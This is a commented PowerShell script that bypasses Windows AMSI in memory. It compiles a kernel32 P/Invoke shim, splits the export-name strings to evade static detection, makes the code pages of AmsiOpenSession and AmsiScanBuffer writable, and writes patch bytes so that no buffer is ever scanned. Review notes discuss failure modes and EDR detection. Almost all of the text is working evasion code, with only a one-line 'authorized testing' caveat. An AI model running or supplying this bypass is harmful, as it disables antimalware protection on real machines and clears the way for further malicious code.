# In-memory AMSI patch for 64-bit PowerShell. The script below overwrites the
# first bytes of two amsi.dll exports in the current process so that scan
# requests from this process fail. Keep this confined to authorized testing.
#
# This block compiles a small C# shim exposing three kernel32 P/Invoke entry
# points used by the rest of the script:
#   LoadLibrary    - maps (or returns the already-mapped) module by name
#   GetProcAddress - resolves an exported function address in that module
#   VirtualProtect - changes page protection so code pages can be written
# The C# source is a here-string and must stay byte-identical; it is compiled
# at runtime by Add-Type. NOTE(review): runtime compilation via Add-Type is
# blocked under Constrained Language Mode / AppLocker policies, so this whole
# script depends on running in Full Language Mode — confirm on the target.
$W = @"
using System;using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $W

# Resolve the two targets. The literals are split with "+" so the assembled
# names ("amsi.dll", "AmsiOpenSession", "AmsiScanBuffer") never appear whole
# in the script text — presumably to dodge a static string match; the runtime
# values are identical to the unsplit strings.
# NOTE(review): none of these results are checked. If amsi.dll is not loaded
# (or the export names change), $L or the addresses are IntPtr.Zero and the
# VirtualProtect / Marshal::Copy calls below operate on address 0; a practitioner
# should gate the patch on all three being non-zero.
$L = [W]::LoadLibrary("am" + "si.dll")
$AmsiOpenSession = [W]::GetProcAddress($L, "Amsi" + "Open" + "Session")
$AmsiScanBuffer = [W]::GetProcAddress($L, "Amsi" + "Scan" + "Buffer")

# Change the protection of the $size bytes at $address to $protection
# (a PAGE_* constant, e.g. 0x40 = PAGE_EXECUTE_READWRITE, 0x20 = PAGE_EXECUTE_READ).
# Returns nothing. The previous protection is captured in $oldProtect but
# discarded, and the bool success result of VirtualProtect is piped to Out-Null,
# so a failed call (e.g. a zero address or a policy that forbids RWX pages)
# is silent and the subsequent Marshal::Copy will fault instead.
# NOTE(review): callers restore protection with a hard-coded 0x20 rather than
# the value reported here; returning $oldProtect would let them restore exactly.
# $size is cast to [uint32]; PowerShell converts it to the UIntPtr the shim expects.
function ChangeMemoryProtection($address, $size, $protection) {
    $oldProtect = 0
    [W]::VirtualProtect($address, [uint32]$size, $protection, [ref]$oldProtect) | Out-Null
}

# Patch bytes (x64 encodings; the 0x48 REX prefix means this is 64-bit only —
# in a 32-bit PowerShell host these bytes decode differently and will corrupt
# the function rather than patch it).
#   48 31 C0             -> xor rax, rax   (written over AmsiOpenSession's
#                           first 3 bytes; the rest of that function still
#                           executes, so the effect depends on the amsi.dll
#                           build — not verifiable from this script)
#   B8 57 00 07 80 C3    -> mov eax, 0x80070057 ; ret
#                           (AmsiScanBuffer returns E_INVALIDARG immediately,
#                           so no buffer is ever scanned in this process)
$NopCode = [Byte[]](0x48, 0x31, 0xC0)
$PatchCode = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

# Make the code page writable (0x40 = PAGE_EXECUTE_READWRITE), copy the
# patch over the export's first bytes, then drop back to 0x20
# (PAGE_EXECUTE_READ). NOTE(review): 0x20 is assumed, not the protection
# that was actually in place before; and the transient RWX page plus the
# write into an amsi.dll export are well-known detection signals for
# Defender/EDR, so do not expect this to be quiet.
ChangeMemoryProtection $AmsiOpenSession 3 0x40
[System.Runtime.InteropServices.Marshal]::Copy($NopCode, 0, $AmsiOpenSession, 3)
ChangeMemoryProtection $AmsiOpenSession 3 0x20

ChangeMemoryProtection $AmsiScanBuffer 6 0x40
[System.Runtime.InteropServices.Marshal]::Copy($PatchCode, 0, $AmsiScanBuffer, 6)
ChangeMemoryProtection $AmsiScanBuffer 6 0x20